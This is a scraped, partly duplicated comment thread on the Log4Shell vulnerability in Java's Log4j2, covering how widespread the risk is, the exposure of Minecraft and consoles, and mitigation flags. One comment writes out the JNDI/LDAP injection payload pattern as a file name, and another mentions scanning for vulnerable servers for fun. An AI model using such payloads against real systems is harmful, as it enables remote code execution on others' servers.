The ubiquity of Java in the corporate sector and how trivially easy it is to exploit. Large companies are also not known for being on top of updating software. Java also has plenty of embedded use...
The ubiquity of Java in the corporate sector and how trivially easy it is to exploit.
Large companies are also not known for being on top of updating software. Java also has plenty of embedded use cases that can't be updated. "3 Billion Devices Run Java", after all...
Trivially easy to exploit means really trivially easy to exploit. I had some fun when this first went public and was able to find loads of vulnerable servers. Most of them have been updated by now, but it's not just front-facing web interfaces that are vulnerable - there are so many ways to get a string to be logged.
Other languages which run on the JVM also make use of Java libraries either through direct interoperability or via wrappers. The access to these huge libraries is often a big selling point for...
Other languages which run on the JVM also make use of Java libraries either through direct interoperability or via wrappers. The access to these huge libraries is often a big selling point for these languages.
Scala, Kotlin, Groovy (especially due to its use in Jenkins CI products), and Clojure come to mind immediately as some of the more popular ones.
Because it's hidden away in more programs than I can count. See: https://github.com/NCSC-NL/log4shell/tree/main/software for the best list to date. But, that's only the public programs. We know...
Because it's hidden away in more programs than I can count. See:
I note that it mentions the Minecraft launcher and the fact that obviously lots of programs use Java and potentially this library. But most of this article seems focused on IT - are there things a...
I note that it mentions the Minecraft launcher and the fact that obviously lots of programs use Java and potentially this library. But most of this article seems focused on IT - are there things a regular PC user should do, or is it more of a server issue...?
Likely not. Java has not been particularly popular as a platform for desktop applications for a while - and Android, for which everything is in Java, has its own standard logging framework. In...
Likely not. Java has not been particularly popular as a platform for desktop applications for a while - and Android, for which everything is in Java, has its own standard logging framework. In addition, if said application isn't directly connected to the internet - it doesn't mean it isn't vulnerable, but with all the juicy servers available it's fairly unlikely someone is going to try and exploit your ebook managers by having you download and open ${jndi:ldap://<host>:<port>/<path>}.epub.
It might be possible for a Minecraft server to RCE the Minecraft client. So if you use Java programs to connect to untrusted servers you need to make sure those programs don't use a vulnerable...
It might be possible for a Minecraft server to RCE the Minecraft client. So if you use Java programs to connect to untrusted servers you need to make sure those programs don't use a vulnerable version of Log4J2
It is likely that somewhere on the PS5 there was an old copy of Log4J2. But I would assume it's patched by now. The main issue with PC Minecraft is players often run very old versions of the game...
It is likely that somewhere on the PS5 there was an old copy of Log4J2. But I would assume it's patched by now. The main issue with PC Minecraft is players often run very old versions of the game that will go unpatched, perhaps forever.
I am somewhat doubtful of that as well. Presumably the PS5's OS descends from Sony's prior OSes, which would be even more unlikely to have any Java on it since memory was a premium until at least...
I am somewhat doubtful of that as well. Presumably the PS5's OS descends from Sony's prior OSes, which would be even more unlikely to have any Java on it since memory was a premium until at least the PS4's generation. Almost all of it is probably C/C++ - and probably C++ with either std excluded or a custom variant of std without the custom allocators.
Even if it did have Java, like Android, it would almost certainly use an in-house logging framework design to work with their devkits.
It is possible that other games run Java, though, in particular indies since LibGDX is fairly popular - although if it's not a multiplayer game I wouldn't worry much about the attack vectors and I'd also be somewhat doubtful that they'd use log4j.
That works in 1.17.x and 1.18.0. For earlier versions, Mojang posted some mitigation steps on their blog. https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
That works in 1.17.x and 1.18.0. For earlier versions, Mojang posted some mitigation steps on their blog.
This is much more of a server issue, but it will still hit PC users if they use corrupted services, which have been cracked by Log4Shell attacks. Think of it as a skeleton key to servers, once...
This is much more of a server issue, but it will still hit PC users if they use corrupted services, which have been cracked by Log4Shell attacks. Think of it as a skeleton key to servers, once unlocked the potential is there for all kinds of attacks.
Log4Shell may, with no exaggeration, be the worst IT security problem of our generation. Here's what is and what you can do about it.
may be the worst IT security problem of our generation so far.
I have trouble believing that because it seems so easy to fix and only affects Java. Care to say why you think it will be the worst?
The ubiquity of Java in the corporate sector and how trivially easy it is to exploit.
Large companies are also not known for being on top of updating software. Java also has plenty of embedded use cases that can't be updated. "3 Billion Devices Run Java", after all...
Trivially easy to exploit means really trivially easy to exploit. I had some fun when this first went public and was able to find loads of vulnerable servers. Most of them have been updated by now, but it's not just front-facing web interfaces that are vulnerable - there are so many ways to get a string to be logged.
Other languages which run on the JVM also make use of Java libraries either through direct interoperability or via wrappers. The access to these huge libraries is often a big selling point for these languages.
Scala, Kotlin, Groovy (especially due to its use in Jenkins CI products), and Clojure come to mind immediately as some of the more popular ones.
I probably got a skewed idea of where things stand from working at Google, and because I stopped working with Java before log4j 2 even came out.
Because it's hidden away in more programs than I can count. See:
https://github.com/NCSC-NL/log4shell/tree/main/software
for the best list to date.
But, that's only the public programs. We know log4j is hidden away in Java JAR files in hundreds of thousands of other programs.
Yeah, my IT department has been shitting themselves all week over this. Lots of reaching out to vendors to ask if they are vulnerable to this exploit.
I’ve never been so happy that all my services are sandboxed.
I note that it mentions the Minecraft launcher and the fact that obviously lots of programs use Java and potentially this library. But most of this article seems focused on IT - are there things a regular PC user should do, or is it more of a server issue...?
Likely not. Java has not been particularly popular as a platform for desktop applications for a while - and Android, for which everything is in Java, has its own standard logging framework. In addition, if said application isn't directly connected to the internet - it doesn't mean it isn't vulnerable, but with all the juicy servers available it's fairly unlikely someone is going to try and exploit your ebook managers by having you download and open
${jndi:ldap://<host>:<port>/<path>}.epub.Just be ready to reset passwords.
It might be possible for a Minecraft server to RCE the Minecraft client. So if you use Java programs to connect to untrusted servers you need to make sure those programs don't use a vulnerable version of Log4J2
The PS5 version of Minecraft isn't written in Java, so you're probably fine. It's the Java version of Minecraft on PC that is in danger.
It is likely that somewhere on the PS5 there was an old copy of Log4J2. But I would assume it's patched by now. The main issue with PC Minecraft is players often run very old versions of the game that will go unpatched, perhaps forever.
That's unlikely. The console versions of Minecraft are running the C++ rewrite of the game. The java version was never shipped to consoles.
I just mean it's got a whole OS in there... gotta have some Java on the computer.
I am somewhat doubtful of that as well. Presumably the PS5's OS descends from Sony's prior OSes, which would be even more unlikely to have any Java on it since memory was a premium until at least the PS4's generation. Almost all of it is probably C/C++ - and probably C++ with either std excluded or a custom variant of std without the custom allocators.
Even if it did have Java, like Android, it would almost certainly use an in-house logging framework design to work with their devkits.
It is possible that other games run Java, though, in particular indies since LibGDX is fairly popular - although if it's not a multiplayer game I wouldn't worry much about the attack vectors and I'd also be somewhat doubtful that they'd use log4j.
Blu-ray Discs use Java for special features.
https://en.wikipedia.org/wiki/BD-J
Even the PS3 had Java. (Though probably no log4j 2.x)
Supposedly adding a
-Dlog4j2.formatMsgNoLookups=trueto the launch options mitigates this in old versions.That works in 1.17.x and 1.18.0. For earlier versions, Mojang posted some mitigation steps on their blog.
https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
Hopefully Mojang adds that as a default launch option
This is much more of a server issue, but it will still hit PC users if they use corrupted services, which have been cracked by Log4Shell attacks. Think of it as a skeleton key to servers, once unlocked the potential is there for all kinds of attacks.